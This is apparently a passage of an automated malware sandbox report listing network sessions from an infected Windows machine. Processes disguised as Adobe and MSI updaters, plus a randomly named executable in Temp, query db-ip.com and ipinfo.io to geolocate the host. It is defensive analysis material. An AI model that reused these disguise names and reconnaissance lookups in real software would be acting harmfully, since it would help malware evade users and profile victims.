2024-05-06 05:54:29 UTC	654	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC4636D2:6994_93878F2E:0050_66387095_BD29277:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dUmvdRqMrmgOUDbnpzFtniLlMlcnoe0c64xeAJNQSu1T5epNqEvqngaPbANIVbMsxUVkFnbQZc9l114SQWbIVBJC60zVxNYo28y3vEU%2BPFuS%2B911zSgFOF%2BlLw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b743dbc69ab3-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.4	49813	104.26.5.15	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	656	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: 6CA2D2DF:ED46_93878F2E:0050_66387095_BD4B894:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R95duH%2BNI3qCI%2FO3CGA0q%2FGWR055aPTj44k9CC41Xrd6BR8rlEFXaq2zQ5qZl7Iz4KSJvJUM3t2mcOc37Svkhs9jUaKJpHX4QDw3GgDsoog3Ggix%2Ft9THotUJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b743dfa34c07-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49811	104.26.5.15	443	6172	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	656	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46FE59:FA7C_93878F2E:0050_66387095_BD4B891:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FQ%2FXslallXV6%2BzLqjzTCZLRQe7%2FUk73jSeffdc8Slg1MZfapidcQhDLp7KSft5eTFmmByIlaBfLXhv231iOMrNNRZbcbjlSoS3ldP8jt7MCCrxr0nebI7Vi5YQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b743da198da6-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49814	104.26.5.15	443	5568	C:\Users\user\AppData\Local\AdobeUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\AdobeUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	654	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46FE45:575A_93878F2E:0050_66387095_BD2927B:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rPlTx6CXIB%2Flv90JA9VzONYhTwjQMvChX9tYVOqYYCTOqR4n0skWBjoLHbFEPtNAqXaF6kAeicZ2%2FawcVRFVLKWuwvcoi3i1eFE28KHA1T2Hu8vvOe74%2FnefzQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b7442ba8a56c-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49815	104.26.5.15	443	5224	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:28 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	656	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC479C9C:647E_93878F2E:0050_66387095_BD4B897:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oVGffj3r7BedzlU%2Fwm7dwIFWmyNpeERcgNKfyLBQqfCNsAazuHrb%2F1feMlyjqTqVU9vZ5Wb8ibzt3%2BUESiIVjosplc0Ui1Gh3BUwJaLCqsAn%2BzvanMxKXTp7mQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b744796e74ae-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49816	104.26.5.15	443	5344	C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:29 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:29 UTC	662	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:29 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46FE77:B34A_93878F2E:0050_66387095_BD4B898:4F34 x-iplb-instance: 59215 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CC%2FOJ6SqRhmx1%2FoOM1EtU9LfMWn9mABxIVBI1xFr2hpqy%2BwsG8CJeq%2BAWuySPI2z8gXH7E8glAQ3SpwHhKsy3v0CBmmokSPIRksm4%2Bn%2FT%2BnM7VrSvz9UyVJ2cQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b7448bba8da0-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:29 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49805	34.117.186.192	443	3336	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:33 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:33 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:33 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 5 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:33 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:33 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49817	104.26.5.15	443	3336	C:\Users\user\AppData\Local\Temp\span0MMV3ZTZWJef\3Q7v9y6Zw0a51Z43zHih.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:33 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:33 UTC	654	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:33 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46369C:922C_93878F2E:0050_66387099_BD29304:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3U%2BTis72g5qcBnMbikZl6TQA3pzxGzwOcRs9qbyEzTwRwQPH4wbKW92OrzL6Wvu53iEEuej9kqziNpuZ%2Byh%2FxXRd8MFR975s1NRb5lRhoQffGvxTUlVsNaTbDg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b7606b9625a7-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:33 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
52	192.168.2.4	49818	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:35 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:35 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:35 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 7 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:35 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:35 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port
53	192.168.2.4	49819	34.117.186.192	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:35 UTC	237	OUT	GET /widget/demo/84.17.40.101 HTTP/1.1 Connection: Keep-Alive Referer: https://ipinfo.io/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: ipinfo.io
2024-05-06 05:54:35 UTC	514	IN	HTTP/1.1 200 OK server: nginx/1.24.0 date: Mon, 06 May 2024 05:54:35 GMT content-type: application/json; charset=utf-8 Content-Length: 1023 access-control-allow-origin: * x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block x-content-type-options: nosniff referrer-policy: strict-origin-when-cross-origin x-envoy-upstream-service-time: 2 via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-06 05:54:35 UTC	741	IN	Data Raw: 7b 0a 20 20 22 69 6e 70 75 74 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 22 64 61 74 61 22 3a 20 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 31 30 31 22 2c 0a 20 20 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 75 6e 6e 2d 38 34 2d 31 37 2d 34 30 2d 31 30 31 2e 63 64 6e 37 37 2e 63 6f 6d 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4d 69 61 6d 69 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 6c 6f 63 22 3a 20 22 32 35 2e 37 37 34 33 2c 2d 38 30 2e 31 39 33 37 22 2c 0a 20 20 20 20 22 6f 72 67 22 3a 20 22 41 53 36 30 30 36 38 20 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 22 2c 0a 20 20 20 20 22 Data Ascii: { "input": "84.17.40.101", "data": { "ip": "84.17.40.101", "hostname": "unn-84-17-40-101.cdn77.com", "city": "Miami", "region": "Florida", "country": "US", "loc": "25.7743,-80.1937", "org": "AS60068 Datacamp Limited", "
2024-05-06 05:54:35 UTC	282	IN	Data Raw: 20 20 20 20 7d 2c 0a 20 20 20 20 22 61 62 75 73 65 22 3a 20 7b 0a 20 20 20 20 20 20 22 61 64 64 72 65 73 73 22 3a 20 22 44 61 74 61 63 61 6d 70 20 4c 69 6d 69 74 65 64 2c 20 5a 64 65 6e 65 6b 20 43 65 6e 64 72 61 2c 20 32 30 37 20 52 65 67 65 6e 74 20 53 74 72 65 65 74 2c 20 57 31 42 20 33 48 48 2c 20 4c 6f 6e 64 6f 6e 2c 20 55 4e 49 54 45 44 20 4b 49 4e 47 44 4f 4d 22 2c 0a 20 20 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 20 20 22 65 6d 61 69 6c 22 3a 20 22 61 62 75 73 65 40 64 61 74 61 63 61 6d 70 2e 63 6f 2e 75 6b 22 2c 0a 20 20 20 20 20 20 22 6e 61 6d 65 22 3a 20 22 41 62 75 73 65 20 43 6f 6e 74 61 63 74 22 2c 0a 20 20 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 34 2e 31 37 2e 34 30 2e 30 2f 32 34 22 2c 0a 20 20 Data Ascii: }, "abuse": { "address": "Datacamp Limited, Zdenek Cendra, 207 Regent Street, W1B 3HH, London, UNITED KINGDOM", "country": "US", "email": "abuse@datacamp.co.uk", "name": "Abuse Contact", "network": "84.17.40.0/24",

Session ID	Source IP	Source Port	Destination IP	Destination Port
54	192.168.2.4	49820	104.26.5.15	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:35 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:35 UTC	662	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:35 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC463681:F66A_93878F2E:0050_6638709B_BD2934E:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FB63rCnxWEol3AyOKPPw2TJaW1FVwsCXUrSbSApVxU0mPz29uXJcEjsyBGdRxVK4Jq%2BW4vda%2F2GqHqo%2Bjigpg%2FpgZE4evNxSuOH3b15V6Rp%2BRGBdW6G%2FIs9Kng%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b76dbae96dce-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:35 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
55	192.168.2.4	49821	104.26.5.15	443

Timestamp	Bytes transferred	Direction	Data
2024-05-06 05:54:36 UTC	261	OUT	GET /demo/home.php?s=84.17.40.101 HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Host: db-ip.com
2024-05-06 05:54:36 UTC	652	IN	HTTP/1.1 200 OK Date: Mon, 06 May 2024 05:54:36 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-iplb-request-id: AC46528D:FEE0_93878F2E:0050_6638709C_BD2935F:7B63 x-iplb-instance: 59128 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=66BF2oSo7m3hzO1rN3XPKSbX37SMhXWkhI5EJ3XBRSzCeoFvDk9%2FYg2OUJCeBvas2md5xGMEozygJVA7sRXYrr0RTDGz2ZevjmVVZxp17BWgiYhpnv2%2BDKSi8A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87f6b770faac2221-MIA alt-svc: h3=":443"; ma=86400
2024-05-06 05:54:36 UTC	85	IN	Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-05-06 05:54:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	07:52:06
